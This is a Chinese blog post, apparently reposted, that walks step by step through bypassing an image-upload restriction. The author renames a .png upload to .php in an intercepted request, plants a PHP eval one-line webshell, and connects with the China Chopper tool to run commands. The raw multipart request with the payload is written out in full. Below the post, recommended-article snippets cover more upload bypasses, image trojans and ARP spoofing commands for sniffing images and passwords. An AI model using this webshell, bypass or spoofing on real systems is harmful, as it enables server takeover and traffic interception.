绕过图片格式限制上传木马获取WebShell

最新推荐文章于 2023-05-07 16:02:25 发布
最新推荐文章于 2023-05-07 16:02:25 发布
阅读量3.4k 收藏 3
点赞数
文章标签: php 前端 ViewUI
原文链接:http://www.cnblogs.com/tdcqma/p/5659270.html
版权

思路:

  图片上传功能中,前端页面上传的是.png格式的图片文件,但是抓包Request中修改图片后缀为.php

可以绕过对上传文件格式的限制,文件的上传路径可以在上传后的页面或查看上传成功后的response中有显示,

记录下来后用菜刀连接即可。 

(1)网站要求上传png格式的文件

(2)保存-抓包,将文件后缀.png删除,剩余.php文件继续提交,提示成功。

Content-Disposition: form-data; name="fun_menu_icon"

test123trojan.php
-----------------------------1962884403821
Content-Disposition: form-data; name="fun_menu_icon_upload"; filename="test123trojan.php"
Content-Type: image/png

<?php @eval($_POST['caidao']); ?>
-----------------------------1962884403821
Content-Disposition: form-data; name="fun_menu_img"

test123trojan.php
-----------------------------1962884403821
Content-Disposition: form-data; name="fun_menu_img_upload"; filename="test123trojan.php"
Content-Type: image/png

<?php @eval($_POST['caidao']); ?>

(3)在原始数据提交页面或提交数据后response页面中查找上传路径并记录。

(4)打开最新版中国菜刀,添加已经记录的路径,添加密码caidao

(5)连接虚拟终端,输入ipconfig

   

木马成功上传并执行。

转载于:https://www.cnblogs.com/tdcqma/p/5659270.html

dieman0446
关注
Webshell上传方式
悦分享
07-31 3853
某天公司的网络运维人员发现公司的业务系统遭到了攻击,被挂了木马,导致公司数据泄露,并且黑客留下了后门。Webshell,顾名思义web指的是在web服务器上,而shell是用脚本语言编写的脚本程序Webshell就是就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,可以对web服务器进行操作的权限,也可以将其称做为一种网页后门。............
【漏洞挖掘】——80、文件上传之内容检测绕过
最新发布
Fly_鹏程万里
06-12 112
exif_imagetype用于判断一个图像的类型,它会读取一个图像的第一个字节并检查其签名,如果发现了恰当的签名则返回一个对应的常量,否则返回 FALSE,在使用时需要开启php_exif模块,对于这种检测方法可以通过制作图片马的方式来绕过检测。imagecreatefromgif、imagecreatefromjpg、imagecreatefromjpeg用于检测文件的格式,对于这三种检测可以通过图片马来绕过。从代码层面来看应该是检测的文件的幻数,那么我们在文件内容的开头增加幻数就OK~
Apache服务器中限制针对某一目录的CGI解析
cnbird's blog
12-11 787
作者:Neeao[B.C.T] 在Linux服务器的web应用中,经常需要上传文件到服务器上。不管是php的也好,jsp的也好,如果web程序对于上传检查不严格,可导致黑客上传webshell,对服务器安全威胁自不用说了。对于 web开发对文件上传限制,这里就不说了,这里仅仅来讨论服务器如何设置才防止上传webshell执行。 记得以前写过一篇文章,针对Windows下web目录的设置
上传图片被防火墙拦截_数据库上传WebShell的三种方式
weixin_39615219的博客
12-03 868
一、什么是WebShell? 简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。 为了更好理解WebShell我们学习两个概念: 什么是“木马”? ...
ASP下检测图片木马的函数代码
01-02
木马原理:入侵者使用诸如ASP图片木马生成器之类的工具将一张正常的图片与一个ASP木马文件合并成一个图片文件(即将对网站有害的 ASP代码插在图片编码之后,虽然图片仍然可以正常显示,但是文件内容和尺寸已被改变),然后通过网站提供的文件上传功能上传这一张“合 ‘法的”图片,进而实现了上传ASP木马的目的。 ‘ 防范方法:因为这种木马是图片与木马的二合一,所以需要在上传图片前检查文件内容,若文件内容不合法(即包含有恶意代码在里面), ‘则禁止上传,从而堵住了木马攻击的源头,这是木马攻击的第一关,至关重要,必须堵住。 ‘****************************************
图片木马
阿刁〇的博客
05-21 3361
文章目录图片木马原理条件漏洞防范制作方法 图片木马 顾名思义,看上去很像图片的木马木马必然是个可执行的程序文件,其后缀名是“exe”。 原理 以文件上传漏洞为基本条件,将可执行的条件写入图片中去,再利用文件包含漏洞来执行图片中存在的一句话木马,从而获取目标服务器的权限。 条件 图片能够正常显示 包含可执行的恶意代码 漏洞防范 尽量使用最新的web服务器版本 图片最好是存入oss,或者图片上传目录注意不要给执行权限(web服务器执行图片目录的权限) 可以的话,对图片进行二次处理,把
文件上传绕过总结1
weixin_51646864的博客
09-27 579
一、客户端检测绕过 场景: 前端上传文件做了限制,例如只允许上传png,jpg等格式图片 绕过方法: (1)前端查看网页代码,将checkFileExt函数删除或者修改限定的文件格式 (2)将一句话木马修改后缀名为png,jpg等格式上传,用burp抓包,再修改回php后缀 二、服务端MIME检测绕过 百度介绍: MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。s是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候
php前端后缀名绕过,有关上传webshell文件绕过的总结
weixin_39911916的博客
03-28 1206
2017-08-15下午碰到一个站,有两处上传漏洞,通过一个点获取webshell,尝试另一个点获取shell,还使用了白盒测试,然而并没有绕过。总结一下,碰到文件上传的好事,应该如何绕过后缀名1. 前台脚本检测扩展名由于是客户端脚本的检测,任何的逻辑都可以通过burpsuit抓包,直接更改报文内容,替换文件扩展名2. Content-Type检测文件类型-绕过Content-Type检测是对h...
WEB渗透学习笔记7——webshell上传绕过
林林木林林L的博客
08-01 3347
webshell 概念 web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,WebShell是一种用来进行网站和服务器管理的脚本程序,webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过一些上传方式,将自己编写的webshell上传web服务器的页面的目录下,攻击者通过上传WebShell获得Web
获取webshell的方法
gugonggugong的博客
01-16 755
一、管理员权限进后台 正常上传:网站对上传文件的后缀并未过滤,直接上传 数据库备份与恢复:网站对上传的文件后缀有过滤,但网站有数据库备份的功能,可以将WebShell格式先改为允许上传的文件格式,然后,我们找到上传后的文件路径,通过数据库备份,将文件备份为脚本格式。 数据库配置文件插码:往配置文件中写入木马 各种绕过姿势:00%截断;特殊后缀文件名绕过;文件名大小绕过 利用解析漏洞:利用低版本的中间件apache、ng...
构造图片木马绕过文件内容检测上传木马
热门推荐
追风筝的孩子
09-04 1万+
      一般文件内容验证使用getimagesizeo函数检测,会判断文件是否是一个有效的文件图片,如果是,则允许上传,否则的话不允许上传。将一句话木马插入到一个【合法】的图片文件当中,然后用菜刀远程连接。     1、选择要上传木马,将后缀名(.php)改成(.php.jpg),发现此文件不允许上传,服务器对上传的内容进行了检测。     2、此时我们随便找个图片,与要上传木马放在同...
文件上传漏洞
weixin_54330542的博客
09-26 1398
那么chr(0)就很好理解了,对照ASCII码表可以知道,ASCII码为0-127的数字,每个数字对应一个字符,而0对应的就是NUT字符(NULL),也就是空字符,而截断的关键就是这个空字符,当一个字符串中存在空字符的时候,在被解析的时候会导致空字符后面的字符被丢弃。直接看源码,明显看出此时的代码是白名单上传,只允许jpg,png,gif这3种后缀上传,那之前的什么大小写绕过,复写绕过,.htaccess文件上传等方式都无效了。文件头是文件开头的一段二进制,不同的图片类型,文件头是不同的。
文件上传漏洞进阶教程/白名单绕过/图片马制作/图片马执行
ChenD的学习笔记
10-23 7831
文件上传漏洞进阶教程/白名单绕过/图片马制作/图片马执行
web安全-文件上传漏洞-图片马制作-相关php函数讲解-upload靶场通关详细教学(3)
ran的博客
01-30 6527
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。
php 图片木马,php图片木马实现原理
weixin_27310417的博客
03-09 4415
什么是木马木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。那,php木马是长什么样的呢?我们来看下面这段代码:...
arp欺骗--简单图片及http密码获取
weixin_43578125的博客
06-18 638
步骤: 1.开启IP流量转发 2.进行欺骗 3.获取图片 4.获取密码 1.开启IP流量转发 echo 1 > /proc/sys/net/ipv4/ip_forward 2.进行欺骗 格式:arpspoof -i 自己的网卡 -t 网关ip 目标ip 例如: arpspoof -i eth0 -t 192.168.0.1 192.168.0.46 3.获取图片 (这里的所有步骤需另开一个终端) 安装driftnet工具 apt-get install driftnet 执行获取 drif
上传图片 webshell php,webshell后门上传流程
weixin_42522626的博客
03-17 1656
1、将webshell.php的后缀名改成jpg等图片格式,即web.jpg。2、打开相应网址,注册好账号后选择上传头像将web.jpg上传期间运行fiddler并设置断点,切换到raw界面,等到其提示相应请求代码后,将其代码段中第二个含有上传图片名称的代码改成web.php,之后继续响应请求。3、此时已经成功把后门程序上传,将服务器反馈的代码中含有路径的部分复制粘贴到网站URL后面(注意将?ph...
文件上传Webshell连接方法
saber的博客
04-19 6446
Webshell就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称为一种网页木马后门,攻击者可以通过这种网页后门获得网站服务器操作权限,控制网站服务器以进行上传下载文件, 查看数据库执行命令 通过服务器开放的端口获取服务器的某些权限。往目标网站中上传一句话木马,然后你就可以在本地通过Shell管理工具连接即可获取和控制整个网站目录。
文件包含漏洞利用之本地包含配合文件上传包含图片马&&文件包含漏洞利用之远程包含Webshell
m0_73720136的博客
05-07 3908
通过本实验,掌握文件上传+文件包含的组合漏洞,在绕过上传的检测时可以制作图片马上传,图片马上传成功不能直接解析,可以利用文件包含的特点进行解析图片马。通过本实验,掌握在无其他漏洞,只有文件包含漏洞,且目标服务器本地无shell文件可利用,又可以远程文件包含时,可以在攻击机本地新建一个一句话木马文件(比如:shell.txt,不要以.php的文件存在,因为php文件在操作机本地会被解析),然后远程包含攻击机本地新建的木马文件,从而Getshell
精通Webshell获取绕过与技巧
5. **文件上传漏洞**:文件上传获取Webshell的常见途径。确保上传的文件名和路径具有可预测性,并能正确执行脚本。同时,利用文件后缀欺骗(如将ASP脚本伪装成图片)可以增加隐蔽性。 6. **WSockExpert工具**:在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值